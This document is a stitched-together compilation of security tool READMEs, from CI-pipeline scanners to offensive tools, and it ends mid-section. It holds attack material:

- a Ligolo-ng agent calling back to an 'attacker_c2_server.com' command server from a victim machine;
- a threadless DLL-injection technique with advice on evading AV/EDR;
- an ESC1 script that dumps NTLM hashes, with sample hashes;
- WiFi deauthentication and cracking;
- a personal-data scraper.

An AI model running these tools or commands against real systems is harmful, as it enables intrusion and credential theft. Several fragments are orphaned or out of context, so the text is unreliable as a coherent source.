raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug
Scrape all publicly accessible GitHub repositories.
raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug
After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.
raven index --debug
Now, we can generate a report using our query library.
raven report --severity high --tag injection --tag unauthenticated
For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:
- Dockerfile (without action.yml). Currently, this behavior isn't supported.
- docker://... URL. Currently, this behavior isn't supported.
- data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
- GITHUB_ENV. This may utilize the previous taint analysis as well.
- actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
If you liked Raven, you would probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
Supported web frameworks (route-detect IDs in parentheses):
- Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
- PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
- Ruby: Rails* (rails), Grape (grape)
- Java: JAX-RS (jax-rs), Spring (spring)
- Go: Gorilla (gorilla), Gin (gin), Chi (chi)
- JavaScript/TypeScript: Express (express), React (react), Angular (angular)
*Rails support is limited. Please see this issue for more information.
Use pip to install route-detect:
$ python -m pip install --upgrade route-detect
You can check that route-detect is installed correctly with the following command:
$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.
Findings:
/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly
1┆ print(1 == 1)
Ran 1 rule on 1 file: 1 finding.
route-detect provides the routes CLI command and uses semgrep to search for routes.
Use the which subcommand to point semgrep at the correct web application rules:
$ semgrep --config $(routes which django) path/to/django/code
Use the viz subcommand to visualize route information in your browser:
$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json
If you're not sure which framework to look for, you can use the special all ID to check everything:
$ semgrep --json --config $(routes which all) --output routes.json path/to/code
If you have custom authn or authz logic, you can copy route-detect's rules:
$ cp $(routes which django) my-django.yml
Then you can modify the rule as necessary and run it like above:
$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json
route-detect uses poetry for dependency and configuration management.
Before proceeding, install project dependencies with the following command:
$ poetry install --with dev
Lint all project files with the following command:
$ poetry run pre-commit run --all-files
Run Python tests with the following command:
$ poetry run pytest --cov
Run Semgrep rule tests with the following command:
$ poetry run semgrep --test --config routes/rules/ tests/test_rules/
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session command to select the agent.
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig command:
[Agent : nchatelain@nworkstation] » ifconfig
[...]
┌───────────────────────────────────────────────┐
│ Interface 3                                   │
├────────────────┬──────────────────────────────┤
│ Name           │ wlp3s0                       │
│ Hardware MAC   │ de:ad:be:ef:ca:fe            │
│ MTU            │ 1500                         │
│ Flags          │ up|broadcast|multicast       │
│ IPv4 Address   │ 192.168.0.30/24              │
└────────────────┴──────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy:
$ nc -lvp 4321
When a connection is made on TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
[Agent : nchatelain@nworkstation] » listener_list
┌────────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                               │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200 Mbits/s server to a 200 Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
- Clone the repository: git clone https://github.com/redhuntlabs/antisquat
- Install dependencies: pip install -r requirements.txt
- Create a file named .openai-key and paste your ChatGPT API key in there.
- Create a file named .godaddy-key and paste your GoDaddy API key in there.
- Create a file named blacklist.txt. Type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
- Run: python3.8 antisquat.py domains.txt
Let's say you'd like to run AntiSquat on "flipkart.com". Create a file named "domains.txt", type in flipkart.com, then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
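To make the permutation step concrete, here is a small illustrative generator (character omission, duplication, and TLD swap). AntiSquat's real generation plus NLP/LLM scoring is considerably richer; the alternate-TLD list below is a placeholder.

def permutations(domain):
    name, tld = domain.rsplit(".", 1)
    results = set()
    for i in range(len(name)):
        results.add(name[:i] + name[i + 1:] + "." + tld)        # omit a character
        results.add(name[:i] + name[i] + name[i:] + "." + tld)  # duplicate it
    for alt in ("net", "org", "co"):                            # swap the TLD
        results.add(name + "." + alt)
    results.discard(domain)
    return sorted(results)

print(permutations("flipkart.com")[:10])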
A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py.
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface
Management platform, check out NVADR.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
⭐ Don't forget to put a star if you like the project!
This software only works on Linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
The installation instructions are available here.
The documentation about the usage of the application is available here.
This project is released under the MIT license.
If you have any question about the usage of the application, do not hesitate to open a discussion.
If you want to report a bug or contribute a feature, do not hesitate to open an issue or submit a pull request.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive tasks and execute them in parallel when the commands do not depend on each other.
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
go install github.com/devanshbatham/rayder@v0.0.4
Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:
rayder -w path/to/workflow.yaml
A workflow is defined in a YAML file with the following structure:
vars:
VAR_NAME: value
# Add more variables...
parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
To define variables, add them to the vars section of your workflow YAML file:
vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value
If you don't provide values for variables via the command line, Rayder will automatically apply the default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
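The override precedence is straightforward; a few lines of Python capture the behavior described above (a sketch of the idea, not Rayder's actual Go source):

import re
import sys

# Defaults from the workflow's vars section (placeholder values)
defaults = {"ORG": "example.org", "OUTPUT_DIR": "results"}
# CLI arguments of the form VAR=value override the defaults
cli = dict(arg.split("=", 1) for arg in sys.argv[1:] if "=" in arg)
variables = {**defaults, **cli}

def render(cmd):
    # Replace every {{VAR}} occurrence; leave unknown placeholders untouched
    return re.sub(r"\{\{(\w+)\}\}", lambda m: variables.get(m.group(1), m.group(0)), cmd)

print(render('echo "Output directory {{OUTPUT_DIR}}"'))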
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
vars:
ORG: "example.org"
OUTPUT_DIR: "results"
modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"
When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:
rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir
This will override the default values and use the provided values for these variables.
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"
parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt
- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false
- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true
- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false
- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false
To execute the above workflow, run the following command:
rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration for this project comes from the awesome Taskfile project.
Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and it supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.
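The extraction core is essentially regex over fetched pages. Here is a miniature illustration; Uscrapper adds crawling, Selenium-based bypasses, multithreading, and far more patterns than these two placeholder regexes.

import re
import requests

html = requests.get("https://example.com").text
# Simplified patterns for demonstration; real-world ones are stricter
emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html))
phones = set(re.findall(r"\+?\d[\d\s().-]{7,}\d", html))
print("emails:", emails)
print("phones:", phones)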
DllNotificationInjection is a POC of a new "threadless" process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
https://shorsec.io/blog/dll-notification-injection/
DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.
gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks
The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and that offer GSSAPI authentication over SSH.
The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt; it can be obtained at the MIT Kerberos Distribution Page. The Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
The libkrb5-dev package needs to be installed prior to installing the python requirements.
Once the requirements are satisfied, you can install the python dependencies via the pip/pip3 tool:
pip install -r requirements.txt
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.
Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.
Adding a DNS A record for host ahost.ad.ginge.com:
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully
Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a '.'; this is important, otherwise the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones from A records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully
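Stripped of the GSS-TSIG authentication layer that gssapi-abuse adds on top, the update itself is a standard RFC 2136 dynamic update. A minimal dnspython sketch mirroring the two examples above (server IP and TTL are illustrative):
import dns.query
import dns.rdatatype
import dns.update

# Forward A record in the ad.ginge.com zone.
fwd = dns.update.Update("ad.ginge.com")
fwd.add("ahost", 300, dns.rdatatype.A, "192.168.128.50")

# The reverse PTR record lives in its own zone, and the data keeps its trailing dot.
rev = dns.update.Update("128.168.192.in-addr.arpa")
rev.add("50", 300, dns.rdatatype.PTR, "ahost.ad.ginge.com.")

for msg in (fwd, rev):
    response = dns.query.tcp(msg, "192.168.128.1", timeout=10)
    print("rcode:", response.rcode())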
Forward and reverse DNS lookup results after execution:
nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1
Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1
Name: ahost.ad.ginge.com
Address: 192.168.128.50
This is a tool I whipped together quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
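A hedged sketch of that loop (Certipy flags are abbreviated/approximate and the BloodHound JSON layout is an assumption; see the tool for the exact invocation):
import json
import subprocess

# Load users from the BloodHound dump; the exact JSON layout is an assumption.
with open("users.json") as f:
    users = [u["Properties"]["samaccountname"] for u in json.load(f)["data"]]

for victim in users:
    # ESC1: request a certificate with the victim's UPN in the SAN...
    subprocess.run([
        "certipy", "req", "-u", "clu@thegrid.local", "-p", "theperfectsystem",
        "-ca", "THEGRID-KFLYNN-DC-CA", "-template", "SmartCard",
        "-upn", f"{victim}@thegrid.local", "-target-ip", "192.168.0.98",
        "-out", f"certificates/{victim}",
    ], check=False)
    # ...then authenticate with the PFX to recover the victim's NT hash.
    subprocess.run([
        "certipy", "auth", "-pfx", f"certificates/{victim}.pfx",
        "-dc-ip", "192.168.0.98",
    ], check=False)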
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
To use this tool we need the following things:
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest relationships to gather for BloodHound is local group memberships and session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
Index:
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and/or targets:
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Since FalconHound is written in Go, there is no installation required. Just download the binary from the releases section and run it; compiled binaries are available for Windows, Linux and MacOS.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.
The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.
./falconhound -go
To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.
./falconhound -actionlist -go
To run a select set of actions, use the -ids parameter, followed by one or a comma-separated list of action IDs. This will run only the specified actions, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.
./falconhound -ids action1,action2,action3 -go
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This allows you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
./falconhound -go -actions-dir /path/to/actions
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag, FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault, it will fall back to the config file.
./falconhound -go -keyvault
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self-explanatory, there are some important things to note about actions:
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
The Query field is the query that will be run against the source. This can be a KQL, SPL or Cypher query, depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription)
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.
- Name: CSV
Enabled: true
Path: path/to/filename.csv
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.
- Name: Neo4j
Enabled: true
Query: |
